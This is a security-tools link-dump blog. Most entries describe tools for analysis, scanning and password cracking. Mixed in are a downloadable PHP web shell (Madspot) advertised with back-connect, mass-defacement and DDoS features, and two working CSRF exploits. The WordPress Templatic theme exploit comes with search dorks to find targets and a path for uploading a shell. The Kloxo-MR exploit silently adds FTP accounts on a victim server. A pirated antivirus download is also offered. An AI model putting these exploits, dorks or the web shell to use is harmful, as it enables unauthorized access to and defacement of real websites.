[Download]

• A checker (site and tool) for CVE-2014-0160: https://github.com/FiloSottile/Heartbleed
• ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford http://pastebin.com/WmxzjkXJ
• SSL Server Test https://www.ssllabs.com/ssltest/index.html
• Metasploit Module: https://github.com/rapid7/metasploit-framework/pull/3206/files
• Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
• Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas https://gist.github.com/RealRancor/10140249
• Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
• Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
• Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Credit: http://hack-tools.blackploit.com/2014/04/collection-of-heartbleed-tools-openssl.html

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
Read more at http://heartbleed.com/

Madspot Shell 1.0 Have Following Features:
Madspot shell works both on Windows and Linux OS.
- Process
- Eval
- SQL
- Hash
- Perl and PHP Back Connect
- Zone-h mass defacer
- Powerfull DDOS tool
- Auto Safe mood Off
- Whole Server Auto Symlink
- Perl 500 Internal Error Bypass
- Killcode

[Download]
Pass=http://madspot.net

What is Malwr?

Malwr is a free malware analysis service and community launched in January 2011. You can submit files to it and receive the results of a complete dynamic analysis back.

Mission

Existing online analysis services are all based on closed and commercial technologies, often with intents to leverage people's data to own profit and with no real transparency on how the data is being used. We are researchers ourselves and felt the need of an alternative solution.
Our mission is to provide a powerful, free, independent and non-commercial service to the security community, independent or academic researchers with no other goal than facilitating everyone's daily work and give a contribution to the community.

Independent

Malwr is operated by volunteer security professionals with the exclusive intent to help the community. It's not associated or influenced by any commercial or government organization of any sort.

Non-Commercial

We do not profit on your data. The files you submit, the information you provide and any other use you make of the website is not commercialized in any way. We create and use open source technology. We're not advertising any commercial product, we are not collecting data to enrich any existing product.

Privacy

Unless you specify otherwise, the files you submit are not shared outside. While we believe in the value of sharing within our community and the larger public, we do strongly believe in respecting your privacy and the confidentiality of the data you handle.
We really invite you to read our Terms of Service for "detailed" "policies".

[Malware Analysis by Cuckoo Sandbox]

Web Application Vulnerabilities: Detect, Exploit, Prevent �Web Application Vulnerabilities: Detect, Exploit, Prevent� Syngress | 2007 | ISBN: 1597492094 9781597492096 9780080556642 | 476 pages | PDF | 17 MB This book describes how to make a computer bend to your will by finding and exploiting vulnerabilities specifically in Web applications. The book describes common security issues in Web applications, tells you how to find them, describes how to exploit them, and then tells you how to fix them. The book covers how and why some hackers (the bad guys) will try to exploit these vulnerabilities to achieve their own end. Author explains how to detect if hackers are actively trying to exploit vulnerabilities in your own Web applications. � Learn to defend Web-based applications developed with AJAX, SOAP, XMLPRC, and more. � See why Cross Site Scripting attacks can be so devastating. Contents Chapter 1 : Introduction to Web Application Hacking Introduction Web Application Architecture Components Complex Web Application Software Components Putting it all Together The Web Application Hacking Methodology The History of Web Application Hacking and the Evolution of Tools Summary Chapter 2 : Information Gathering Techniques Introduction The Principles of Automating Searches Applications of Data Mining Collecting Search Terms Summary Chapter 3 : Introduction to Server Side Input Validation Issues Introduction Cross Site Scripting (XSS) Chapter 4 : Client-Side Exploit Frameworks Introduction AttackAPI BeEF CAL9000 Overview of XSS-Proxy Summary Solutions Fast Track Frequently Asked Questions Chapter 5 : Web-Based Malware Introduction Attacks on the Web Hacking into Web Sites Index Hijacking DNS Poisoning (Pharming) Malware and the Web: What, Where, and How to Scan Parsing and Emulating HTML Browser Vulnerabilities Testing HTTP-scanning Solutions Tangled Legal Web Summary Solutions Fast Track Frequently Asked Questions Chapter 6 : Web Server and Web Application Testing with BackTrack Objectives Introduction Approach Core Technologies Open Source Tools Case Studies: The Tools in Action Chapter 7 : Securing Web Based Services Introduction Web Security Instant Messaging Web-based Vulnerabilities Buffer Overflows Making Browsers and E-mail Clients More Secure Securing Web Browser Software CGI Break-ins Resulting from Weak CGI Scripts FTP Security Directory Services and LDAP Security Summary Solutions Fast Track Frequently Asked Questions Index Web Application Vulnerabilities: Detect, Exploit, Prevent  
[Download]

Salted Hash Kracker is the free all-in-one tool to recover the Password from Salted Hash text. These days most websites and applications use salt based hash generation to prevent it from being cracked easily using precomputed hash tables such as Rainbow Crack. In such cases, 'Salted Hash Kracker' will help you to recover the lost password from salted hash text.

It also allow you to specify the salt position either in the beginning of password(salt+password) or at the end of the password (password+salt). In case you want to perform normal hash cracking without the salt then just leave the 'Salt field' blank.

Currently it supports password recovery from following popular Hash types

• MD5
• SHA1
• SHA256
• SHA384
• SHA512

It uses dictionary based cracking method which makes the cracking operation simple and easier. You can find good collection of password dictionaries (also called wordlist) here & here

It is fully portable and works on all Windows platforms starting from Windows XP to Windows 8.

[Download]

A tool to help developers and security professionals conduct manual security code reviews in a consistent and repeatable way. Agnitio aims to replace the adhoc nature of manual security code review documentation, create an audit trail and reporting.

Features

• Security code reviews
• Security code review metrics and reporting
• Application security code review tool
• Static analysis security guidance and reporting

[Download]

Description

This program is a scanner that helps detect and delete virus such as "MyDoom, Sasser, etc", created with custom engine developed by VirAtt Viruslab this program fastly detect, delete, and destroy process file of the virus itself including fixing registry error caused by the virus.

Features

• Destroy Worm Process (Mydoom, Sasser, etc.)
• Super small process and file
• Delete virus and worm file in system directory
• Fix Registry errors caused by the virus
• Unhide windows function (Task Manager, MSConfig, etc)

[Download]

The problem that we experienced in the past was the difficulty to exchange information about (targeted) malwares and attacks within a group of trusted partners, or a bilateral agreement. Even today much of the information exchange happens in unstructured reports where you have to copy-paste the information in your own text-files that you then have to parse to export to (N)IDS and systems like log-searches, etc…

A huge challenge in the Cyber Security domain is the information sharing inside and between organizations. This platform has as goal to facilitate:

• central IOC database: storing technical and non-technical information about malwares and attacks, … Data from external instances is also imported into your local instance
• correlation: automatically creating relations between malwares, events and attributes
• storing data in a structured format (allowing automated use of the database for various purposes)
• export: generating IDS, OpenIOC, plain text, xml output to integrate with other systems (network IDS, host IDS, custom tools, …)
• import: batch-import, import from OpenIOC, GFI sandbox, ThreatConnect CSV, …
• data-sharing: automatically exchange and synchronization with other parties and trust-groups

Exchanging info results in faster detection of targeted attacks and improves the detection ratio while reducing the false positives. We also avoid reversing similar malware as we know very fast that others already worked on this malware.

[Download]

Adobe Malware Classifier is a command-line tool that lets antivirus analysts, IT administrators, and security researchers quickly and easily determine if a binary file contains malware, so they can develop malware detection signatures faster, reducing the time in which users' systems are vulnerable.

Malware Classifier uses machine learning algorithms to classify Win32 binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for “malicious,” or “UNKNOWN.”

The tool was developed using models resultant from running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a dataset of approximately 100,000 malicious programs and 16,000 clean programs. 

The tool extracts seven key features from an unknown binary, feeds them to one of the four classifiers or all of them, and presents its classification of the unknown binary.

[Download]

As the first company Avira Antivirus German, now able to market to a very good antivirus. Avira Internet Security antivirus offered by this company is one of the most powerful yet high-performance and show data, it can be considered one of the strongest available security package into account. The software of your computer against viruses, worms, Internet 's, Trojans, ad and spyware you, robots (Bots) and protects them from dangerous spyware. The important features of Avira Internet Security software uses very few system resources, settings and user interface is very simple scanner tool to prepare profiles, search for detection of malware, safety Mail POP3 and SMTP against viruses and malware powerful servers to download updates faster, at intervals specified by the user to update, complete security against phishing, rootkits and phishing attacks and security systems that are fully integrated.

A key feature of the software Avira Internet Security:
- Brabranva effective protection from viruses, Trojans, worms and other threats 
- effectively detect and remove rootkits 
- High scanning speed 
- new interface design graphics software 
- protect the system against attacks known as phishing 
- protection against all types of malware and spyware 
- Special protection against viruses for emails (POP 3) 
- Quickly update feature through Server Premium 
- emergency rescue system disc 
- saver for web browsing and Download Safe 
- Powerful embedded firewall software 
- anti-spam and passive AntiPhishing 
- performance to match data Abbey 
- being friendly 
- and ...

- Min. 150 MB available disk space 
- Min. 512 MB ??RAM (Windows XP) 
- Min. 1024th MB RAM (Windows Vista, Windows 7) 
- For all installations: Windows Internet Explorer 6.0 or higher 
- Administrator rights are required for the installation

1.Run setup file & install it.
2.Select offline activation & activate using key file

[Torrent Link]

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

[Download]

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:

• detect central command and control (C&C) servers
• understand peer-to-peer networks
• observe DNS fast-flux infrastructures
• quickly determine if a network artifact is 'known-bad'

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.
Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)

[Download]

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.

Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:

• ASP.NET VIEWSTATE insecure configurations
• JavaServer MyFaces ViewState without cryptographic protections
• Cross-domain stylesheet and javascript references
• User-controllable cross-domain references
• User-controllable attribute values such as href, form action, etc.
• User-controllable javascript events (e.g. onclick)
• Cross-domain form POSTs
• Insecure cookies which don't set the HTTPOnly or secure flags
• Open redirects which can be abused by spammers and phishers
• Insecure Flash object parameters useful for cross-site scripting
• Insecure Flash crossdomain.xml
• Insecure Silverlight clientaccesspolicy.xml
• Charset declarations which could introduce vulnerability (non-UTF-8)
• User-controllable charset declarations
• Dangerous context-switching between HTTP and HTTPS
• Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
• Potential HTTP referer leaks of sensitive user-information
• Potential information leaks in URL parameters
• Source code comments worth a closer look
• Insecure authentication protocols like Digest and Basic
• SSL certificate validation errors
• SSL insecure protocol issues (allowing SSL v2)
• Unicode issues with invalid byte streams
• Sharepoint insecurity checks
• more….

[Download]

Hydra is a parallelized network logon cracker which supports numerous protocols to attack, new modules are easy to add, beside that, it is flexible and very fast.

Features

• IPv6 Support
• Graphic User Interface
• Internationalized support (RFC 4013)
• HTTP proxy support
• SOCKS proxy support

The tool supports the following protocols:

Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more.

[Download]

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

[Download]

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]

#Author : Jje Incovers

#Date : 31/03/2014

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/

#Download : http://templatic.com/wordpress-themes-store/

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

 

#Dork :

inurl:/wp-content/themes/Realestate/

inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/

inurl:/wp-content/themes/specialist/

 

CSRF File Upload Vulnerability

 

Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

 

<html>

<body>

<center>

<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

">

 

<br>

</br>

<input name="uploadfile[]" type="file" />

 

<br>

<input type="submit" value="upload" />

</form>

</center>

</body>

</html>

 

File Access :

http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

 

Note :

Script CSRF equate with dork you use

 

########################################

#Greetz : SANJUNGAN JIWA , All Indonesian H4xor

#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,

########################################

 

# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #




http://1337day.com/exploit/22091

Hashkill is an opensource hash cracker for Linux that uses OpenSSL. Currently it supports 4 attack methods (dictionary, bruteforce, hybrid).

Hashkill has 35 plugins for different types of passwords (ranging from simple hashes like MD5 and SHA1 to passworded ZIP files and private SSL key passphrases).

Multi-hash support (you may load hashlists of length up to 1 million) and very fast GPU support on Nvidia (compute capability 2.1 cards also supported) and ATI (4xxx, 5xxx and 6xxx).

The latest update includes 9 new plugins: bfunix, drupal7, django256, sha256unix, mssql-2012, o5logon, msoffice-old, msoffice, luks. Of them msoffice-old is currently supported on CPU only, the rest are GPU-accelerated. Improved bitmaps handling in non-salted kernels addded, so that huge hashlists would be cracked at faster speeds. Now Thermal monitoring can now be disabled using -T 0 command-line argument.

[Download]

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product tailored for your specific operating system, please consider John the Ripper Pro, which is distributed primarily in the form of "native" packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.

Changelog v1.8.0

• Revised the incremental mode to let the current character counts grow for each character position independently, with the aim to improve efficiency in terms of successful guesses per candidate passwords tested.
• Revised the pre-defined incremental modes, as well as external mode filters that are used to generate .chr files.
• Added makechr, a script to (re-)generate .chr files.
• Enhanced the status reporting to include four distinct speed metrics (g/s, p/s, c/s, and C/s).
• Added the “–fork=N” and “–node=MIN[-MAX]/TOTAL” options for trivial parallel and distributed processing.
• In the external mode compiler, treat character literals as unsigned.
• Renamed many of the formats.
• Updated the documentation.
• Relaxed the license for many source files to cut-down BSD.
• Relaxed the license for John the Ripper as a whole from GPLv2 (exact version) to GPLv2 or newer with optional OpenSSL and unRAR exceptions.
• Assorted other changes have been made.

[Download]

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.

[Download] 

NetBScanner is a network scanner tool that scans all computers in the IP addresses range you choose, using NetBIOS protocol. For every computer located by this NetBIOS scanner, the following information is displayed: IP Address, Computer Name, Workgroup or Domain, MAC Address, and the company that manufactured the network adapter (determined according to the MAC address). NetBScanner also shows whether a computer is a Master Browser. You can easily select one or more computers found by NetBScanner, and then export the list into csv/tab-delimited/xml/html file.

[Download]

MAC Address Scanner is the free desktop tool to remotely scan and find MAC Address of all systems on your local network.

It allows you to scan either a single host or range of hosts at a time. During the scan, it displays the current status for each host. After the completion, you can generate detailed scan report in HTML/XML/TEXT/CSV format.

Note that you can find MAC address for all systems within your subnet only. For all others, you will see the MAC address of the Gateway or Router.

On certain secure WiFi configurations with MAC filtering enabled, this tool can help Pentesters to find out active MAC addresses and then use them to connect to such wireless network.

Being GUI based tool makes it very easy to use for all level of users including beginners.

It is fully portable and works on all platforms starting from Windows XP to Windows 8.

[Download]

Script to help with installing and configuring Metasploit Framework, Armitage and the Plugins I have written on OSX and Linux

To use the script on OSX Java, Xcode and Command Development Tools from Xcode must be installed before running the script. In the case of OSX I also added the option of installing GNU GCC in the case you want to compile the old Ruby 1.8.7 that requieres it. When you download the script you must make it executable, when ran with no arguments or with -h it will how the usage help message:

$ chmod +x msf_install.sh 
$ ./msf_install.sh -h
Scritp for Installing Metasploit Framework
By Carlos_Perez[at]darkoperator.com
Ver 0.1.0

-i                :Install Metasploit Framework.
-p      :password for MEtasploit databse msf user. If not provided a roandom one is generated for you.
-g                :Install GNU GCC (Not necessary uless you wish to compile and install ruby 1.8.7 in OSX
-h                :This help message

To start the installation you just run the script with the -i option and the installation will start. In the case of OSX it will:

• Check that dependencies are meet.
• Check if Homebrew is installed and of not it will install it.
• Install Ruby 1.9.3
• Install base ruby gems.
• Install and configure Postgres for use with Metasploit
• Install GCC if selected.
• Download and install Metasploit Framework.
• Installs all necessaries Ruby Gems using bundler.
• Configure the database connection and sets the proper environment variables.
• Download and install the latest version of Armitage.
• Download and install the Pentest plugin and DNSRecon Import plugin.

in the case of Ubuntu 12.10 and 13.04 it will:

• Install all necessary packages
• Install base ruby gems.
• Configure Postgres for use with Metasploit
• Download and install Metasploit Framework.
• Installs all necessaries Ruby Gems using bundler.
• Configure the database connection and sets the proper environment variables.
• Download and install the latest version of Armitage.
• Download and install the Pentest plugin and DNSRecon Import plugin.

[Download]

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 

[Link To Go]

Cuckoo Sandbox is an Open Source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behavior of the malicious processes while running in an isolated environment.

Cuckoo generates a handful of different raw data which include:

• Native functions and Windows API calls traces
• Copies of files created and deleted from the filesystem
• Dump of the memory of the selected process
• Screenshots of the desktop during the execution of the malware analysis
• Network dump generated by the machine used for the analysis

In order to make such results more consumable to the end users, Cuckoo is able to process them and generate different type of reports, which could include:

• JSON report
• HTML report
• MAEC report
• MongoDB interface
• HPFeeds interface

Cuckoo Sandbox 0.6 (2012-04-15)

===============================

(note for author’s blog)

This release represents a major step forward for the quality of the project: you won’t find an endless list of new features this time, but a handful of solid improvements that should make your experience with sandboxing much more pleasant.

Along with a few smaller additions, the focus of 0.6 revolves around the introduction of network logging. Until now the retrieval of the analysis results from the analysis machines happened through an inefficient and resource-expensive XMLRPC transaction. With Cuckoo Sandbox 0.6 we are now able to collect behavioral logs, dropped files, screenshots and memory dumps in real-time from the analysis machines through the use of what it’s been called ResultServer.

The advantages of this approach are multiple:

• You will now see results coming in in real-time.
• The memory errors and timeouts that used to occur with previous versions when trying to retrieve the resuts are now gone!
• Even if the analysis machine is somehow compromised (crashed, shutdown or otherwise locked) you will still have complete results up to that point.
• Probably some more advantages, but it’s already awesome as it is.

[Download]

If you have a suspicious file, please submit it online by using the form below. Once the file is submitted, COMODO Automated Analysis System will scan it and report back its findings.

[Comodo Instant Malware Analysis]

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal’s mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.

[VirusTotal]

VirusTotal Scanner is the desktop tool to quickly perform Anti-virus scan using VirusTotal.com

VirusTotal.com is a free online scan service that analyzes suspicious files using 40+ Anti-virus applications. It facilitates the quick detection of viruses, worms, trojans, all kinds of malware and provides reliable results preventing any False Positive cases.

'VirusTotal Scanner' is the desktop tool which helps you to quickly scan your file using VirusTotal without actually uploading the file. It performs direct Hash based scan on VirusTotal thus reducing the time taken to upload the file.

It comes with attractive & user friendly interface making the VirusTotal scanning process simpler and quicker. You can simply right click on your file and start the scan.

It is fully portable tool but also comes with Installer for local installation & un-installation. It works on wide range of platforms starting from Windows XP to Windows 8.

[Download]

# Exploit Title     :Kloxo-MR 6.5.0 CSRF Vulnerability

# Vendor Homepage   :https://github.com/mustafaramadhan/kloxo/tree/dev

# Version   :Kloxo-MR 6.5.0.f-2014020301

# Tested on         :Centos 6.4

# Exploit Author    :Necmettin COSKUN =>@babayarisi

# Blog              :http://www.ncoskun.com http://www.grisapka.org

# Discovery date    :03/12/2014

# CVE               :N/A

  

Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).

This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').

================

CSRF Vulnerability

  

Vulnerability

================

Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key

So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.

 

Poc Exploit

================

 

 <html>

 <head><title>Kloxo-MR demo</title></head>

 <script type="text/javascript">

 function yurudi(){

        ///////////////////////////////////////////////////////////

        //Kloxo-MR 6.5.0  CSRF Vulnerability         //

        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //

        //Blog: http://www.ncoskun.com | http://www.grisapka.org //

        ///////////////////////////////////////////////////////////

        //Remote host

        var host="victim.com"; 

        //New Ftp Username

        var username="demouser";

        //New Ftp Password

        var pass="12345678";

        //This creates new folder under admin dir. /admin/yourfolder

        var dir="demodirectory";

        //If necessary only modify http to https ;)

        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";

 

        document.getElementById('demoexploit').src=urlson;

}

 </script>

 <body onload="yurudi();">

 <img id="demoexploit" src=""></img>

 </body>

 </html>

  

  

Discovered by:

================

Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!